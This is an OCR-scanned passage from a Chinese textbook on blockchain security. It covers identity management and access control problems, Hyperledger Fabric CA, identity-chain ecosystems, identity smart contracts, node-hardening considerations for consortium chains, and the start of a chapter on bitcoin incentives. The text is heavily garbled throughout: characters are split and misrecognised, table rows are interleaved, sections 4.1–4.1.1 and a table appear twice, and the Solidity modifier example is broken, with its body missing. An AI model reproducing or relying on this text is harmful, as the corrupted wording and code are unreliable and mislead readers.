身份 碎片 化 中 心 化 的 ， 因 为 有 关 用 户 的 所 有 数据 都 存储 在 用 户 可 以 控制 的 终端 设备 
中 。 但 是 对 于 黑客 来 说 是 完全 去 中 心 化 ， 因 为 没有 一 个 中 心 化 的 机 构 真 
正 拥 有 用 户 的 数据 ， 其 攻击 的 代价 会 大 大 地 增加 。 这 样 用 户 的 数据 便 可 





以 得 到 有 效 的 保护 
( 续 ) 
“传统 身份 管理 与 访问 控制 系统 的 问题 | ”区 块 链 的 解决 方法 
ep 用 户 的 身份 数据 应 该 由 用 户 来 控制 。 用 户 可 以 按照 交易 的 需求 只 透露 一 
用 户 对 身份 没有 控制 权 ehh 
口令 的 痛苦 区 块 链 可 以 利用 公 钥 、 私 钥 进行 验证 ， 也 可 以 利用 生物 认证 来 摆脱 口令 














利用 区 块 链 数 据 的 不 可 自 改 性 ， 里 份 证 明 的 结 采 可 以 用 加 密 的 方式 发 布 
身份 证 明 是 一 个 人 工 操作 、 成 本 昂 | 到 区 块 链 上 。 需 要 获得 身份 证 明 结果 的 机 构 (比如 金融 机 构 的 KYC 需求 ) 
贯 的 过 程 可 以 在 用 户 授 权 的 情况 下 ， 利 用 简单 的 API 调用 来 比较 便宜 地 获取 身份 
证 明 的 结 采 。 这 样 可 以 大 大 减少 社会 成 本 
身份 是 静态 的 、 伪 人 硬 的、 不 灵活 的 利用 可 以 参数 化 的 智能 合约 身份 可 以 实现 动态 和 灵活 的 身份 管理 系统 


3.3 ”智能 合约 中 的 身份 管理 与 访问 控制 


3.3.1 ”传统 身份 管理 与 访问 控制 系统 的 问题 


身份 管理 与 访问 控制 系统 是 IT 系统 安全 的 基石 ， 但 是 这 个 重要 的 系统 一 直 以 来 几乎 都 被 一 些 传统 的 1T 巨 头 (如 Orale、1IBM、 微 软 等 ) 所 把 持 ， 而 这 些 公司 在 身份 管理 与 访问 控制 系统 方面 缺乏 创新 ， 
从 而 导致 目前 身份 管理 与 访问 控制 系统 存在 众多 问题 ， 如 表 3-1 所 示 。 我 们 随后 会 介绍 区 块 链 如 何 解决 这 些 痛 点 。 


表 3-1 身份 管理 与 访问 控制 系统 的 问题 

传统 身份 管理 与 访问 控制 系统 的 问题 问题 描述 

一 个 人 的 在 线 身 份 是 碎片 化 的 。 例 如 ， 微 信 、 淘 宝 、 滴 滴 等 都 会 有 我 们 

的 身份 。 实 际 上 ， 我 们 都 不 清楚 这 些 中 心 化 的 公司 掌握 了 我 们 哪 一 些 信 
身份 碎片 化 息 ， 它 们 如 何 用 我 们 的 信息 进行 变现 。 但 是 对 黑客 而 言 ， 身 份 存储 在 每 一 
家 中 心 化 的 公司 的 数据 库 里 面 ， 一 旦 攻击 成 功 就 可 以 获得 很 多 甚至 所 有 用 
户 数据 。 在 互联 网 历史 上 有 很 多 黑客 成 功 偷 取 大 量 用 户 数据 的 例子 
由 于 我 们 不 清楚 中 心 化 的 公司 掌握 了 我 们 哪 一 些 信息 ， 因 此 对 自己 的 身 
份 属性 没有 控制 ， 也 没有 办 法 保护 隐私 
我 们 有 太 多 的 口令 需要 记 住 ， 也 会 经 常 忘记 口令 。 口 令 是 传统 身份 管理 
系统 最 大 的 痛 点 ， 没 有 人 喜欢 口令 ， 但 是 我 们 不 得 不 用 它 
如 果 要 在 银行 开 立 账户 ， 我 们 需要 携带 身份 证 去 银行 办 理 。 有 时 还 要 
提供 其 他 一 些 信息 ， 以 备 银行 进行 验证 。 这 势必 会 费 一 定 的 时 间 。 而 作 
身份 证 明 是 一 个 人 工 操作 、 成 本 昂 | 为 KYC 的 一 部 分 (知道 你 的 客户 )， 身 份 证 明 也 是 一 个 成 本 非常 昂贵 的 过 
贯 的 过 程 程 ， 且 每 年 都 在 增加 。 一 些 银行 甚至 为 KYC 支付 5 亿美 元 以 上 (https:// 


www.thomsonreuters.com/en/press-releases/2016/may/thomson-reuters-2016- 


用 户 对 号 份 没有 控制 权 





| know-your-customer-surveys.htm!l) 

在 传统 的 IT 系统 ,身份 的 属性 定义 是 基于 模式 (Schema)， 例 如 微软 的 
身份 是 静态 的 、 伪 人 硬 的 、 不 灵活 的 | Active Directory Schema。 一 旦 定义 ， 很 难 扩展 或 修改 。 身 份 属性 的 每 个 

变化 都 需要 重新 启动 应 用 程序 


表 3-2 总 结 了 区 块 链 如 何 解 决 上 面 提 到 的 问题 。 
表 3-2 区 块 链 的 解决 方法 
传统 身份 管理 与 访问 控制 系统 的 问题 区 块 链 的 解决 方法 
利用 区 块 链 技术 ， 用 户 的 数据 不 会 存储 在 中 心 化 的 机 构 ， 而 是 存储 在 用 
户 可 以 控制 的 终端 比如 手机 或 者 区 块 链 醒 件 “钱包 ”中 。 在 区 块 链 上 可 以 
存储 相关 信息 的 加 密 随机 数 ， 而 不 是 数据 本 身 。 这 样 ， 对 于 用 户 来 说 是 
身份 碎片 化 中 心 化 的 ， 因 为 有 关 用 户 的 所 有 数据 都 存储 在 用 户 可 以 控制 的 终端 设备 
中 。 但 是 对 于 黑客 来 说 是 完全 去 中 心 化 ， 因 为 没有 一 个 中 心 化 的 机 构 真 
正 拥有 用 户 的 数据 ， 其 攻击 的 代价 会 大 大 地 增加 。 这 样 用 户 的 数据 便 可 


以 得 到 有 效 的 保护 
( 续 ) 
传统 身份 管理 与 访问 控制 系统 的 问题 区 块 链 的 解决 方法 
pp 用 户 的 身份 数据 应 该 由 用 户 来 控制 。 用 户 可 以 按照 交易 的 需求 只 透露 一 
用 户 对 身份 没有 控制 权 ee 
口令 的 痛苦 区 块 链 可 以 利用 公 钥 、 私 钥 进 行 验证 ， 也 可 以 利用 生物 认证 来 摆脱 口令 


利用 区 块 链 数据 的 不 可 小 改 性 ， 喘 份 证 明 的 结果 可 以 用 加 密 的 方式 发 布 
身份 证 明 是 一 个 人 工 操作 、 成 本 昂 | 到 区 块 链 上 。 需 要 获得 身份 证 明 结 果 的 机 构 〈 比 如 金融 机 构 的 KKYC 需求 ) 
贵 的 过 程 可 以 在 用 户 授权 的 情况 下 ， 利 用 人 简单 的 API 调用 来 比较 便宜 地 获取 身份 
证 明 的 结果 。 这 样 可 以 大 大 减少 社会 成 本 
身份 是 静态 的 、 伪 人 硬 的、 不 灵活 的 利用 可 以 参数 化 的 智能 合约 身份 可 以 实现 动态 和 灵活 的 身份 管理 系统 


3.3.2 ”智能 合约 的 身份 管理 


公有 链 容许 任何 人 加 入 区 块 链 网 络 ， 因 此 不 需要 身份 管理 和 访问 控制 系统 ; 而 许可 链 (包括 联盟 链 和 私有 链 ) 则 必须 对 参与 者 进行 身份 验证 和 访问 控制 ， 因 此 身份 管理 系统 是 智能 合约 必 不 可 少 的 安 
全 基础 。 下 面 主 要 来 看 看 Hyperledger Fabric 的 身份 管理 系统 。 


Hyperledger Fabric 采 用 的 身份 管理 系统 (Fabric CA) 是 一 个 中 心 化 的 身份 管理 系统 ， 具 有 如 下 的 功能 ( 见 图 3-2) 。 
.身份 认证 ， 或 者 从 LDAP 中 获取 注册 信息 。 
发 行 担保 证 书 ECerts (Entollment Certif icates) 。 
. 发 行 交易 证 书 TCerts (Transaction Cettif icates) ， 保 障 Hyperledger Fabric 区 块 链 交易 平台 上 的 信息 匿名 性 和 不 可 追踪 性 。 
证 书 更 新 和 撤销 。 
与 Fabric CA 服务 端 交 互 的 方式 有 如 下 两 种 : 
. 通过 Fabric CA 客户 端 。 
. 使 用 某 种 Fabtic SDK。 
与 Fabric CA 服务 端的 所 有 通信 ， 都 是 通过 REST API 进 行 的 。 


如 图 3-2 所 示 ，Fabric CA 客户 端 或 SDK 的 请 求 首先 会 到 达 Fabric CA 集群 前 端的 高 可 用 负载 均衡 服务 端 ， 实 际 的 CA 服务 由 后 端的 某 台 Fabric CA 服务 端 提供 。 同 一 集群 中 的 所 有 Fabric CA 服务 端 共 享 
相同 的 后 端 数据 库 (或 LDAP) 集群 ， 以 确保 证 书 和 身份 的 一 致 性 。 


在 访问 控制 上 ，Fabric 采 用 以 下 的 策略 。 


1) 可 以 将 区 块 链 的 网 络 隔离 成 通道 ， 每 个 通道 只 允许 一 部 分 已 经 被 赋予 权限 的 参与 者 查看 部 署 到 该 通道 的 Chaincode 的 数据 。 
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Fabric:CA 
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图 3-2 身份 管理 系统 (Fabtic CA) 


2) 在 通道 内 ， 可 以 通过 可 见 性 (Visibility) 设置 来 限制 对 Chaincode 输 入 数据 ， 仪 限于 一 组 已 经 被 赋予 权限 的 Endorsers。 可 见 性 设置 将 决定 输入 和 输出 Chaincode 数 据 是 否 包含 在 提交 的 事务 中 ， 
而 不 仅仅 是 输出 数据 。 


3) 可 以 在 调用 Chaincode 之 前 对 数据 进行 散 列 或 加 密 。 如 果 对 数据 进行 散 列 ， 那 么 需要 提供 一 种 共享 源 数据 的 方法 ;如 果 对 数据 进行 加 密 ， 则 需要 提供 一 种 共享 解密 密 铀 的 方法 。 
4) 通过 将 访问 控制 构建 到 Chaincode 逻 辑 中 ， 达 到 一 定 的 基于 角色 的 访问 控制 。 
5) 存储 器 上 的 数据 可 以 加 密 ， 并 且 传 输 中 的 数据 通过 TLS 进 行 加 密 。 


尽管 HyperLedger Fabric 的 身份 管理 系统 利用 CA 的 集群 来 提高 可 用 性 和 解决 单 点 问题 ， 但 该 方案 仍 是 一 个 中 心 化 的 方案 。 因 此 ，CA 的 集群 可 能 成 为 黑客 攻击 的 目标 ， 从 而 导致 整个 Fabric 网 络 的 不 
安全 。R3 的 Corda 也 采用 同样 的 CA 的 集群 ， 并 利用 微软 的 ActiveDirectory 来 管理 用 户 的 身份 ， 因 此 存在 与 Fabric CA 相同 的 问题 。 


下 面 要 介绍 去 中 心 化 的 身份 管理 系统 ， 也 就 是 身份 链 。 


3.3.3 ”身份 链 的 定义 和 国外 典型 身份 链 的 分 析 
顾名思义 ， 身 份 链 是 在 区 块 链 上 具有 用 户 身份 信息 的 链 。 链 上 的 用 户 信息 可 以 是 加 密 的 私密 个 人 信息 ， 也 可 以 是 非 加 密 的 公开 信息 。 纵 观 国 外 的 身份 链 项 目 ， 我 们 可 以 总 结 出 以 下 的 特点 。 
1) 大 部 分 的 用 户 信 息 ， 特 别 是 用 户 的 私密 信息 一 般 不 会 发 布 在 区 块 链 上 ， 而 是 以 加 密 的 形式 存储 在 用 户 的 终端 设备 或 者 去 中 心 化 的 星际 文件 系统 (InterPlanetary File System，IPFS) 中 。 
2) 人 存储 在 区 块 链 上 的 是 用 户 信息 经 过 验证 后 进行 加 密 和 随机 数 化 的 结果 。 身 份 验证 者 或 者 使 用 者 必须 经 过 用 户 的 同意 ， 并 且 得 到 临时 许可 (过 时 间 不 能 使 用 ) 的 令 牌 才能 验证 或 者 使 用 用 户 的 信息 。 


3) 身份 链 的 客户 端 一 般 都 是 智能 手机 。 智 能 手机 中 包含 加 密 数 字 货 币 的 “钱包 ”，“ 钱 包 ” 里 面包 含 用 户 的 私 钥 。 如 果 私 钥 丢 失 了 ， 怎 么 办 呢 ? 部 分 身份 链 系 统 比 如 uPort 提 供 了 一 种 处 理 方法 ， 可 
以 通过 别人 帮忙 证 明 来 产生 新 的 私 钥 ， 以 代替 旧 的 私 钥 。 
4) 身份 链 客户 端的 验证 一 般 都 会 使 用 生物 验证 的 方法 。 例 如 ， 利 用 指纹 和 虹膜 的 验证 来 保护 私 钥 。 再 加 上 一 次 性 口令 ， 用 来 保护 客户 端 与 链 上 交互 的 安全 。 


5) 个 别 区 块 链 使 用 智能 合约 的 方式 来 实现 身份 数据 的 访问 控制 。 


如 图 3-3 所 示 是 目前 比较 活跃 的 国外 身份 链 公司 。 
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图 3-3 ”目前 比较 活跃 的 国外 身份 链 公司 


其 他 相关 的 身份 链 公 司 在 欧洲 和 美国 正在 不 断 涌现 。 之 所 以 出 现 这 样 的 情形 ， 主 要 是 因为 大 家 都 认为 身份 链 和 智能 “钱包 ”是 区 块 链 安全 的 基础 ， 而 且 能 够 得 到 广泛 的 应 用 。 在 中 国 ， 贵 州 高 新 区 也 
立 党 员 档 案 


在 利用 身份 链 进行 精准 扶贫 。 中 国 银行 也 在 身份 链 方面 做 了 非常 多 的 工作 ， 如 以 身份 链 为 技术 基础 建立 了 “公益 中 国 ”， 并 且 已 经 在 中 国 银行 内 部 使 用 身份 链 来 处 理 党 务 ， 比 如 提交 党 费 、 建 立 党 员 


等 
村 o 


3.3.4 身份 链 的 生态 系统 


身份 链 的 中 心思 想 是 用 智能 合约 来 构建 身份 链 。 智 能 合约 的 以 下 特性 对 身份 链 的 构建 是 至 天 重要 的 。 

1) 智能 合约 可 以 拥有 状态 变量 ， 变 量 可 以 人 存储 身份 链 的 静态 或 者 动态 的 信息 。 比 如 身份 的 公开 地 址 是 静态 信息 ， 但 是 身份 的 权限 信息 可 以 是 动态 的 。 

2) 智能 合约 可 以 定义 APl。API 可 以 是 公开 的 (Public) ， 也 可 以 是 私有 的 (Private) 。 身 份 智能 合约 使 用 API 可 以 定义 动态 的 基于 身份 属性 的 行为 ， 对 于 外 部 不 能 调用 的 基于 身份 属性 的 行为 ， 可 以 
用 私有 的 APl。 

3) 身份 智能 合约 需要 更 多 的 安全 审查 ， 最 好 能 用 形式 化 验证 来 测试 身份 智能 合约 。 

4) 因为 身份 信息 有 生命 周期 ， 身 份 智 能 合约 必须 有 对 应 的 生命 周期 ， 包 括 身份 的 建立 、 权 限 的 确定 和 改变 ， 以 及 身份 的 终止。 

身份 链 的 生态 系统 有 以 下 几 个 参与 者 。 

1) 身份 中 介 (Identity Oracle) : 链 上 和 链 下 的 衔接 者 。 智 能 合约 的 执行 结果 必须 是 确定 的 ， 多 个 节点 必须 对 同一 个 运行 结果 达成 共识 ， 因 此 智能 合约 不 能 直接 使 用 没有 达成 共识 的 链 下 的 数据 。 
Oracle 可 提供 诸如 利率 、 汇 率 或 影响 合约 运行 结果 的 任何 其 他 信息 ， 但 其 所 提供 的 信息 必须 是 Oracle 签 名 的 ， 确 保 交 易 双 方 能 够 验证 其 来 源 ; 而 且 在 规定 时 间 内 不 可 修改 ， 以 便 为 事后 审计 或 争议 提供 证 


据 。Oracle 一 般 以 商业 方式 运作 ， 确 保 能 够 收取 一 定 的 服务 费用 。 身 份 中 介 可 以 是 银行 、 政 府 机 关 、 教 育 机 构 等 ， 它 们 可 以 提供 经 过 验证 的 正确 的 身份 信息 。 比 如 ， 教 育 机 构 可 以 证 明 某 一 个 人 从 哪 一 个 
学 校 获 得 哪 一 个 学 位 ， 银 行 可 以 证 明 哪 一 个 用 户 目前 存款 的 数量 。 这 些 机 构 可 以 运行 身份 链 的 节点 并 且 收 取 一 定 的 服务 费用 。 


2) 身份 提供 者 (ldentity Provider) : 即 身份 链 本 身 ， 用 来 对 发 布 在 链 上 的 身份 信息 进行 验证 ， 以 达成 共识 ; 并 且 提 供 AP1， 为 身份 消费 者 提供 身份 验证 和 访问 控制 的 服务 。 需 要 注意 的 是 ， 身 份 提 
供 者 必须 获得 身份 拥有 者 的 许可 (一 般 使 用 许可 令 牌 ，Access Token) 才 可 以 提供 身份 验证 的 服务 。 由 于 有 关 隐 私 的 身份 信息 在 链 上 是 加 密 的 ， 或 者 是 人 存储 在 链 下 ， 身 份 链 的 安全 实现 可 以 使 用 逐渐 成 熟 


的 零 知 识 证 明 或 者 同 态 加 密 的 技术 。 身 份 提供 者 可 以 是 公安 部 、 运 营 商 、 银 行 或 者 公司 企业 ， 它 们 可 以 运行 身份 链 需 要 的 节点 来 作为 身份 提供 者 。 身 份 链 本 身 可 以 是 多 链 或 者 单一 的 链 。 


3) 身份 消费 者 (ldentity Consumer) : 在 得 到 身份 所 有 者 的 许可 的 前 提 下 ， 将 身份 信息 用 于 商业 或 个 人 目的 。 通 常 身 份 消费 者 是 一 个 公司 或 组 织 ， 例 如 需要 满足 KYC (Know Your Customer， 知 
道 你 的 客户 ) 要 求 的 银行 ， 或 需要 身份 信息 进行 验证 或 更 好 地 满足 客户 需求 的 在 线 电 商 。 


4) 身份 的 所 有 者 (Identity Owner) : 拥有 身份 的 实际 个 人 或 实体 (使 用 私 钥 来 证 明 所 有 权 ) 。 在 身份 链 的 架构 中 ， 身 份 的 所 有 者 控制 身份 的 数据 ， 并 且 可 以 对 身份 数据 进行 变现 。 


图 3-4 展 示 的 是 一 个 多 链 的 身份 管理 生态 系统 。 身 份 消 费 者 使 用 多 链 的 身份 管理 生态 系统 的 流程 如 下 。 
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图 3-4 多 链 的 身份 管理 生态 系统 


1) 身份 消费 者 ， 比 如 一 家 银行 对 新 的 客户 有 KYC (Know Your Customer， 知 道 你 的 客户 ) 的 需求 ， 必 须 获 得 身份 拥有 者 的 许可 。 这 个 许可 可 以 用 身份 链 的 客户 端 ， 也 就 是 智能 手机 的 数字 “ 钱 
包 ” 产 生 一 个 许可 令 牌 (Access Token) 。 智 能 手机 在 产生 许可 令 牌 前 ， 用 户 必须 用 生物 认证 的 方法 ， 比 如 指纹 和 虹膜 扫描 来 保证 安全 。 


2) 身份 消费 者 可 以 向 多 链 的 身份 管理 生态 系统 中 的 某 一 条 链 发 起 KYC 的 请 求 。 在 图 3-4 中 ， 身 份 消费 者 向 人 民 银 行 发 起 KYC 的 请 求 。 如 果 人 民 银 行 可 以 满足 这 个 请 求 ， 流 程 就 可 以 完成 。 


3) 如 果 一 条 链 不 能 完全 提供 所 有 信息 ， 可 以 转发 给 其 他 的 身份 链 。 比 如 ， 在 用 户 同意 的 情况 下 ， 通 过 联通 获得 有 关 用 户 在 联通 的 数据 。 也 可 以 在 用 户 同意 的 情况 下 ， 通 过 公安 部 获得 有 关 用 户 在 公安 
部 的 信息 数据 。 


4) 如 果 需 要 验证 的 信息 在 所 有 的 身份 链 上 均 不 存在 ， 可 以 利用 Oracle 获 得 可 信 的 链 下 身份 数据 。 


3.3.5 身份 智能 合约 
本 节 介 绍 身 份 链 所 需要 的 身份 智能 合约 。 身 份 智能 合约 包括 身份 的 属性 和 身份 的 API。 身 份 的 属性 包括 隐私 的 信息 和 公开 的 信息 ， 如 生日 、 工 资 等 ， 也 可 以 包含 公共 信息 ， 如 毕业 的 学 校 、 在 政府 机 构 
的 职位 等 。 


身份 的 属性 可 以 由 ldentity Oracle 在 身份 所 有 者 的 批准 下 进行 验证 和 插入 ， 该 属性 可 以 加 密 。 对 于 隐私 的 信息 ， 身 份 所 有 者 决定 哪个 身份 消费 者 可 以 访问 哪个 隐私 的 属性 ， 并 且 可 设 定 访问 多 长 时 
间 ， 是 否 容许 身份 消费 者 存储 信息 等 。 


身份 智能 合约 的 API 可 以 包括 以 下 类 型 的 API (可 以 用 REST API) 。 

1) 身份 信息 查询 : 按照 权限 查询 身份 信息 ， 包 括 身份 信息 的 加 密 和 解密 。 

2) 基于 属性 的 访问 控制 : 可 以 按照 身份 的 属性 实现 比较 动态 的 访问 控制 。 

3) 身份 生命 周期 : 身份 的 创建 、 身 份 的 修改 (由 于 区 块 链 数据 的 不 可 算 改 性 ， 修 改 可 以 通过 追加 记录 来 完成 ) 和 身份 的 移 除 。 


4) 访问 控制 策略 的 创建 、 修 改 和 移 除 。 


3.3.6 ”区 块 链 洛 地 的 身份 管理 与 访问 控制 考虑 


(1) 公有 链 的 身份 管理 与 访问 控制 考虑 


大 部 分 区 块 链 系 统 ， 特 别 是 公有 链 (比如 以 太 坊 ) ， 没 有 身份 管理 系统 ， 但 是 我 们 可 以 用 以 下 的 方法 实现 对 智能 合约 的 访问 控制 。 


可 以 借助 于 修饰 符 (modif ier) 来 实现 对 智能 合约 函数 的 访问 控制 。 假 设 我 们 不 希望 某 些 函数 被 所 有 人 调用 ， 可 以 创建 一 个 修饰 符 并 限制 函数 用 法 。 以 类 似 的 方式 ， 我 们 可 以 有 多 个 不 同 的 角色 ， 根 
据 不 同情 况 定义 修饰 符 。 


下 面 是 一 个 使 用 修饰 符 onlyMember ( 仅 供 成 员 使 用 ) 来 规定 访问 控制 的 例子 。 








modifier onlyMember 











Var index = DataStore (memberStore) .getAddressIndex('account', msg.sender); 
Var state = DataStore (memberStore) .getIntValue (index, 'state'); 

if (index != 0 && state == 0) 

{ 





























} 
else 
{ 
Status (100) ， 
} 
} 














// 使 用 上 面 定义 的 修饰 符 
function getMyBooks() constant onlyMember returns (string bookString, uint8 count) 


{ 
} 




















return getBooks (true); 


(2) 联盟 链 的 身份 管理 与 访问 控制 考虑 

联盟 链 在 具体 落地 时 ， 可 以 考虑 建立 节点 准 入 条 件 。 比 如 回答 以 下 问题 。 

.哪个 操作 系统 可 以 使 用 : 例如 Redhat、CentOS 等 。 

. 哪些 端口 要 关闭 : 例如 关闭 FTP、SMTP、TFTP 端 口 。 其 他 高 危 端口 包括 135、137、138、139、445、1025、2475、3127、6129、3389、593 端 口 等 。 
` 哪些 系统 账户 被 禁用 : 例如 关闭 对 区 块 链 点 对 点 通信 无 用 的 系统 账号 ， 如 Windows 的 Administrator 账 号 。 

` 特权 账户 的 密码 复杂 度 : 比如 需要 英文 字母 、 数 字 、 特 殊 字 符 等 。 

. 特权 账户 的 密码 到 期 时 间 : 比如 365 天 后 必须 重新 设置 密码 。 

` 使 用 哪个 CA 根 证 书 (CA root) : 联盟 链 的 成 员 需 要 共同 使 用 并 且 接 受 同样 的 证 书 授权 机 构 (CA) 或 者 开发 一 个 去 中 心 化 的 CA 架构 。 


` 联盟 链 的 成 员 之 间 身 份 属性 的 映射 规则 和 访问 控制 策略 : 某 家 参与 联盟 链 公司 的 管理 员 不 一 定 可 以 变 成 另外 一 家 参与 相同 联盟 链 公司 的 管理 员 。 我 们 需要 制定 身份 属性 的 映射 规则 和 访问 控制 策 


(3) 私有 链 的 身份 管理 与 访问 控制 考虑 


私有 链 属于 一 家 企业 或 者 机 构 在 公司 内 部 部 署 的 区 块 链 项 目 。 从 身份 管理 与 访问 控制 的 角度 来 看 ， 应 该 尽 可 能 地 使 用 已 经 在 企业 内 部 使 用 的 身份 管理 系统 ， 例 如 大 部 分 系统 使 用 微软 的 Active 
Directory (AD) 。 因 此 ， 区 块 链 项 目 与 AD 的 拉 通 可 以 提高 区 块 链 的 安全 性 。 


3.4 ”本 章 小 结 


在 当今 信息 化 社会 ， 安 全 问题 已 经 成 为 人 们 关注 的 焦点 ,没有 人 喜欢 将 自己 的 隐私 暴露 给 其 他 人 。 对 于 区 块 链 也 是 一 样 。 由 于 区 块 链 出 现 的 时 间 不 长 ， 人 们 对 它 的 认 知 还 不 够 深入 ， 因 此 存在 巨大 的 
安全 隐患 。 为 促进 其 健康 、 良 性 友 展 ， 必 须要 做 好 安全 管理 。 本 章 围绕 这 一 主题 ， 从 多 个 方面 对 相关 技术 做 了 深入 分 析 。 首 先 ， 从 应 用 层 的 安全 角度 ， 对 应 用 层 的 10 个 方面 进行 了 分 析 ; 然后 针对 智能 合 
约 的 安全 性 ， 从 6 个 方面 进行 了 分 析 ; 最 后 从 智能 合约 的 身份 管理 与 访问 控制 的 角度 ， 对 其 安全 性 进行 分 析 。 


通过 本 章 内 容 的 介绍 ， 可 以 让 人 们 对 应 用 和 智能 合约 层 的 安全 控制 有 更 为 深入 的 了 解 ， 明 晰 安全 性 对 区 块 链 发 展 的 重要 性 ， 并 且 了 解 采 取 什 么 措施 ， 可 以 有 效 避 免 风 险 的 发 生 ， 从 而 实现 安全 控制 的 
预期 目标 ， 促 进 区 块 链 的 发 展 。 


第 4 章 ”激励 层 安 全 机 制 设 计 


区 块 链 本 质 上 就 是 一 种 分 布 式 共 识 和 价值 激励 相 结合 的 技术 体系 : 一 方面 通过 数学 和 算法 实现 整个 系统 的 共识 与 信任 ; 另 一 方面 通过 激励 机 制 保证 生态 体系 的 平衡 和 良性 发 展 。 在 去 中 心 化 的 公有 链 
中 ， 必 须 激励 遵守 规则 的 参与 记 账 节点 、 和 您 罚 不 遵守 规则 的 节点 ， 才 能 让 系统 朝 着 良性 循环 的 方向 发 展 。 区 块 链 激 励 层 将 经 济 因素 引入 区 块 链 技术 体系 ， 芝 来 组 织 协 作 效 率 和 生态 内 价值 交换 效率 的 提 
升 ， 是 保证 区 块 链 良 性 循环 发 展 的 重要 机 制 。 


4.1 激励 的 产生 和 分 配 


4.1.1 激励 机 制 价值 


区 块 链 技术 在 非 信任 环境 中 构造 了 一 套 信 任 服务 的 基础 设施 。 这 种 去 中 心 化 的 分 布 式 账 本 技术 构建 了 共享 、 透 明 的 新 生态 ， 让 区 块 链 中 的 每 个 节点 不 再 依赖 一 个 统一 的 中 心 ， 而 是 基于 同一 套 共 识 规 
则 来 协同 工作 。 在 去 中 心 化 系统 中 ， 中 央 方 被 内 部 协议 框架 所 取代 ， 由 其 管控 系统 运作 ， 人 允许 系统 参与 者 们 自己 执行 交易 验证 。 基 于 分 布 式 账本 系统 ， 无 须 权威 方 参与 或 背书 ， 而 是 通过 使 用 来 自 计算 和 
密码 学 的 技术 进行 验证 ， 人 允许 跨越 网 络 的 成 员 对 总 账 的 有 效 性 达成 共识 ， 从 而 通过 技术 手段 构筑 自身 的 价值 体系 ， 解 决 信任 问题 。 但 在 去 中 心 化 系统 中 ， 共 识 节点 本 身 是 自 利 的 ， 各 节点 消耗 自身 资源 参 
与 数据 验证 和 记 账 的 根本 目标 是 最 大 化 自身 收益 。 因 此 ， 为 保证 共识 节点 个 体 理性 行为 与 保障 去 中 心 化 系统 的 安全 和 有 效 运行 的 整体 目标 相 吻 合 ， 让 去 中 心 化 体系 良性 运转 ， 必 须 引 入 一 种 符合 经 济 模型 
的 激励 机 制 ， 使 得 各 方 能 跨越 传统 的 组 织 信任 边界 ， 建 立 一 种 无 界 、 协 同 且 良性 发 展 的 生产 关系 ， 进 而 形成 共识 节点 的 大 规模 参与 ， 促 使 去 中 心 化 系统 正常 运转 。 


加 密 数字 通 证 (Token) 是 这 种 去 中 心 化 生态 体系 激励 的 一 种 价值 载体 ， 通 过 将 去 中 心 化 系统 中 账本 维护 的 奖励 进行 通 证 化 ， 参 与 方 能 够 在 一 个 统一 的 维度 上 构建 价值 共识 体系 ， 从 而 在 无 信任 基础 


的 节点 间 构 建 出 合作 协同 、 价 值 分 配 、 共 创 生 态 繁荣 的 规则 和 模式 。 去 中 心 化 的 特性 是 加 密 通 证 激励 产生 和 分 配 基 础 体系 的 核心 因素 ， 是 保证 加 密 通 证 价值 稳定 和 价值 存储 能 力 的 关键 ,也 构成 了 加 密 通 
证 的 关键 属性 。 通 证 激励 模式 重 塑 了 价值 的 分 配方 式 ， 是 维持 整个 去 中 心 化 商业 生态 体系 运转 的 血液 。 


4.1 激励 的 产生 和 分 配 


4.1.1 激励 机 制 价值 


区 块 链 技术 在 非 信任 环境 中 构造 了 一 套 信 任 服务 的 基础 设施 。 这 种 去 中 心 化 的 分 布 式 账 本 技术 构建 了 共享 、 透 明 的 新 生态 ， 让 区 块 链 中 的 每 个 节点 不 再 依赖 一 个 统一 的 中 心 ， 而 是 基于 同一 套 共 识 规 
则 来 协同 工作 。 在 去 中 心 化 系统 中 ， 中 央 方 被 内 部 协议 框架 所 取代 ， 由 其 管控 系统 运作 ， 人 允许 系统 参与 者 们 自己 执行 交易 验证 。 基 于 分 布 式 账本 系统 ， 无 须 权威 方 参与 或 背书 ， 而 是 通过 使 用 来 自 计算 和 
密码 学 的 技术 进行 验证 ， 人 允许 跨越 网 络 的 成 员 对 总 账 的 有 效 性 达成 共识 ， 从 而 通过 技术 手段 构筑 自身 的 价值 体系 ， 解 决 信任 问题 。 但 在 去 中 心 化 系统 中 ， 共 识 节点 本 身 是 自 利 的 ， 各 节点 消耗 自身 资源 参 
与 数据 验证 和 记 账 的 根本 目标 是 最 大 化 自身 收益 。 因 此 ， 为 保证 共识 节点 个 体 理性 行为 与 保障 去 中 心 化 系统 的 安全 和 有 效 运行 的 整体 目标 相 吻 合 ， 让 去 中 心 化 体系 良性 运转 ， 必 须 引 入 一 种 符合 经 济 模型 
的 激励 机 制 ， 使 得 各 方 能 跨越 传统 的 组 织 信任 边界 ， 建 立 一 种 无 界 、 协 同 且 良性 发 展 的 生产 关系 ， 进 而 形成 共识 节点 的 大 规模 参与 ， 促 使 去 中 心 化 系统 正常 运转 。 


加 密 数字 通 证 (Token) 是 这 种 去 中 心 化 生态 体系 激励 的 一 种 价值 载体 ， 通 过 将 去 中 心 化 系统 中 账本 维护 的 奖励 进行 通 证 化 ， 参 与 方 能 够 在 一 个 统一 的 维度 上 构建 价值 共识 体系 ， 从 而 在 无 信任 基础 
的 节点 间 构 建 出 合作 协同 、 价 值 分 配 、 共 创 生 态 繁 茉 的 规则 和 模式 。 去 中 心 化 的 特性 是 加 密 通 证 激励 产生 和 分 配 基 础 体系 的 核心 因素 ， 是 保证 加 密 通 证 价值 稳定 和 价值 存储 能 力 的 关键 ,也 构成 了 加 密 通 
证 的 关键 属性 。 通 证 激励 模式 重 塑 了 价值 的 分 配方 式 ， 是 维持 整个 去 中 心 化 商业 生态 体系 运转 的 血液 。 


4.1.2 ”比特 币 激励 


比特 币 系 统 是 典型 的 通过 经 济 激励 机 制 实现 自我 驱动 的 系统 。 比 特 币 系统 的 可 靠 性 依赖 于 整个 系统 的 算 力 所 构筑 的 强大 壁 人 至 。 比 特 币 系统 不 需要 任何 机 构 维 持 其 信用 ， 仪 通过 技术 手段 就 可 创建 共 
识 ， 从 而 产生 价值 。 


1. 转 账 交易 激励 


比特 币 通过 创 币 交易 到 达 矿 工钱 包 后 ， 通 过 转账 交易 进 入 流通 网 络 。 比 特 币 只 有 发 行 和 转账 两 种 交易 ， 并 且 在 产生 后 只 能 由 一 个 人 转移 给 另 一 个 人 ， 而 不 能 赁 空 消失 。 而 人 在 转账 交易 过 程 中 ， 人 存在 着 
参与 转账 的 人 员 之 间 的 利益 再 分 配 过 程 ， 具 体 表 现 为 挖 矿 节 点 收取 的 交易 手续 费 。 


